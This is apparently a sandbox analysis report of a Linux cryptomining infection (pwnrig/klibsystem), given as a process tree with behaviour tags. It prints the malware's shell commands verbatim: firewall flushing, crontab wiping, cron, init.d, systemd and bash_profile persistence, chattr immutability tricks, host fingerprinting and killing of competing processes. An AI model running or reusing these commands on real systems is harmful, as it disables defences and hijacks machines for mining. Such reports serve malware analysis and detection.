/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵PID:1709
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:1710
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:1711
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:1712
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:1713
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:1714
-
-
-
-
/usr/bin/bashbash -c "iptables -P INPUT ACCEPT"2⤵PID:1715
-
-
/usr/sbin/iptablesiptables -P INPUT ACCEPT2⤵PID:1715
-
-
/usr/bin/bashbash -c "iptables -P OUTPUT ACCEPT"2⤵PID:1716
-
-
/usr/sbin/iptablesiptables -P OUTPUT ACCEPT2⤵PID:1716
-
-
/usr/bin/bashbash -c "iptables -P FORWARD ACCEPT"2⤵PID:1717
-
-
/usr/sbin/iptablesiptables -P FORWARD ACCEPT2⤵PID:1717
-
-
/usr/bin/bashbash -c "iptables -F"2⤵PID:1721
-
-
/usr/sbin/iptablesiptables -F2⤵PID:1721
-
-
/usr/bin/bashbash -c "chattr -ia /etc/ld.so.preload"2⤵PID:1722
-
-
/usr/bin/chattrchattr -ia /etc/ld.so.preload2⤵PID:1722
-
-
/usr/bin/pgreppgrep -f klibsystem42⤵
- Reads runtime system information
PID:1733
-
-
/usr/bin/pgreppgrep -f klibsystem52⤵PID:1742
-
-
/usr/bin/chattrchattr +ia /etc/init.d/knlib2⤵PID:1764
-
-
/etc/init.d/knlib/etc/init.d/knlib start2⤵
- Executes dropped EXE
PID:1775 -
/usr/bin/cpcp -f -r -- /bin/knlib5 /bin/klibsystem53⤵PID:1776
-
-
/usr/bin/rmrm -rf -- klibsystem53⤵PID:1778
-
-
/usr/bin/nohupnohup ./klibsystem53⤵PID:1777
-
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/knlibe.service2⤵PID:1781
-
-
/usr/bin/systemctlsystemctl daemon-reload2⤵
- Reads EFI boot settings
PID:1785
-
-
/usr/bin/systemctlsystemctl enable knlibe.service2⤵
- Reads EFI boot settings
PID:1989
-
-
/usr/bin/chattrchattr +ia /bin/knlib52⤵PID:2074
-
-
/usr/bin/crontabcrontab -r2⤵PID:2075
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads runtime system information
PID:2076
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads runtime system information
PID:2088
-
-
/usr/bin/bashbash -c "echo \"* * * * * /opt/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:2097
-
/usr/bin/crontabcrontab -3⤵PID:2100
-
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵
- Attempts to change immutable files
PID:2107
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:2109
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵PID:2111
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵PID:2119
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵PID:2128
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵PID:2138
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵PID:2145
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵PID:2149
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:2152
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:2154 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2155
-
/usr/bin/whoamiwhoami4⤵PID:2166
-
-
/usr/bin/hostnamehostname4⤵PID:2167
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2168
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2184
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2186
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Reads runtime system information
PID:2185
-
-
/usr/bin/idid -u4⤵PID:2188
-
-
/usr/bin/grepgrep -v grep4⤵PID:2191
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:2190
-
-
/usr/bin/psps x4⤵PID:2189
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- Attempts to change immutable files
- Writes file to tmp directory
PID:2193 -
/usr/bin/idid -u4⤵PID:2194
-
-
/usr/bin/idid -u4⤵PID:2195
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵PID:2196
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵PID:2197
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:2198
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
PID:2199
-
-
/usr/bin/idid -u4⤵PID:2200
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:2201
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:2202
-
-
/usr/bin/chattrchattr -i -a "/etc/cron.*/pwnrig" /bin/crondr4⤵PID:2203
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵PID:2204
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
PID:2205
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:2207
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:2208
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2209
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2210
-
-
/usr/bin/whichwhich chkconfig4⤵PID:2211
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:2212
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵PID:2213
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵PID:2214
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:2215
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2216
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2216
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2216
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:2216
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵PID:2251
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
PID:2252
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:2258
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:2260
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵PID:2261
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:2263
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2267
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2267
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2267
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:2267
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:2322
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:2323
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵PID:2323
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:2323
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵
- Reads EFI boot settings
PID:2323
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2324
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2324
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2324
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:2324
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
PID:2352
-
-
/usr/bin/whichwhich systemctl4⤵PID:2353
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:2354
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵PID:2355
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
PID:2356
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
PID:2362
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵PID:2363
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:2375
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵
- Reads EFI boot settings
PID:2376
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
- Reads EFI boot settings
PID:2404
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:2443
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
- Reads EFI boot settings
- Reads runtime system information
PID:2469
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2526 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2550
-
/usr/bin/whoamiwhoami4⤵PID:2561
-
-
/usr/bin/hostnamehostname4⤵PID:2562
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2563
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2579
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2581
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵PID:2580
-
-
/usr/bin/idid -u4⤵PID:2583
-
-
/usr/bin/grepgrep -v grep4⤵PID:2586
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:2585
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
- Reads runtime system information
PID:2584
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2588
-
/usr/bin/idid -u4⤵PID:2589
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:2594
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵PID:2593
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:2592
-
-
/usr/bin/grepgrep -v grep4⤵PID:2591
-
-
/usr/bin/psps aux4⤵
- Reads CPU attributes
- Reads runtime system information
PID:2590
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵PID:2596
-
/usr/bin/idid -u4⤵PID:2597
-
-
-
-
/usr/bin/crontabcrontab -r2⤵PID:2782
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵PID:2783
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads CPU attributes
PID:2784
-
-
/usr/bin/bashbash -c "echo \"* * * * * /run/user/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:2785
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:2787
-
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib42⤵PID:2788
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵PID:2789
-
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib42⤵PID:2790
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:2791
-
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib42⤵PID:2792
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵PID:2793
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib42⤵
- Attempts to change immutable files
PID:2794
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵PID:2795
-
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib42⤵
- Attempts to change immutable files
PID:2796
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵PID:2797
-
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib42⤵PID:2798
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵PID:2799
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵
- Attempts to change immutable files
PID:2800
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵PID:2801
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:2802 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2803
-
/usr/bin/whoamiwhoami4⤵PID:2814
-
-
/usr/bin/hostnamehostname4⤵PID:2815
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2816
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2832
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2834
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads runtime system information
PID:2833
-
-
/usr/bin/idid -u4⤵PID:2836
-
-
/usr/bin/grepgrep -v grep4⤵PID:2839
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:2838
-
-
/usr/bin/psps x4⤵
- Reads runtime system information
PID:2837
-
-
-
